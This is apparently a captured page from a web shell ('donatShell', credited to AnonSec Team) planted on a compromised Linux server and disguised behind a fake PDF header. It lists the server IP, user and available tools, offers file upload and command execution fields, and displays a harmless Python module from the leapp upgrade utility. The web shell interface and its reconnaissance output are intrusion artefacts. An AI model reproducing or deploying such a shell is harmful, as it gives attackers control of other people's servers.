%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY donat Was Here
donatShell
Server IP : 188.40.95.74  /  Your IP : 216.73.216.205
Web Server : Apache
System : Linux cp01.striminghost.net 3.10.0-1160.119.1.el7.tuxcare.els13.x86_64 #1 SMP Fri Nov 22 06:29:45 UTC 2024 x86_64
User : vlasotin ( 1054)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python2.7/site-packages/leapp/utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/lib/python2.7/site-packages/leapp/utils/actorapi.py
import os
import socket

import requests
import requests.adapters
import requests.exceptions

try:
    import requests.packages.urllib3 as urllib3  # noqa # pylint: disable=consider-using-from-import
except ImportError:
    import urllib3


RequestException = requests.exceptions.RequestException
"""
Exceptions that are raised through the actor API, which is retrieved from :py:func:`get_actor_api`
"""
_session = None


class _LeappAPIConnection(urllib3.connection.HTTPConnection):
    def __init__(self, timeout=60):
        self.sock = None
        super(_LeappAPIConnection, self).__init__('localhost', timeout=timeout)
        self.timeout = timeout

    def connect(self):
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(self.timeout)
        socket_path = os.environ.get('LEAPP_ACTOR_API', '/tmp/actors.sock')
        sock.connect(socket_path)
        self.sock = sock


class _LeappAPIConnectionPool(urllib3.connectionpool.HTTPConnectionPool):
    def __init__(self, timeout=60):
        super(_LeappAPIConnectionPool, self).__init__('localhost')
        self.timeout = timeout

    def _new_conn(self):
        return _LeappAPIConnection(self.timeout)


class _LeappAPIAdapter(requests.adapters.HTTPAdapter):
    def __init__(self, timeout=60):
        super(_LeappAPIAdapter, self).__init__()
        self.timeout = timeout

    def get_connection(self, url, proxies=None):
        return _LeappAPIConnectionPool(timeout=self.timeout)

    def request_url(self, request, proxies):
        return request.path_url


def get_actor_api():
    """
    :return: An instance of the Leapp actor API session that is using :py:class:`requests.Session` over a
             UNIX domain socket
    """
    global _session
    if _session:
        return _session
    _session = requests.session()
    _session.adapters.clear()
    _session.mount('leapp://', _LeappAPIAdapter())
    return _session

Anon7 - 2022
AnonSec Team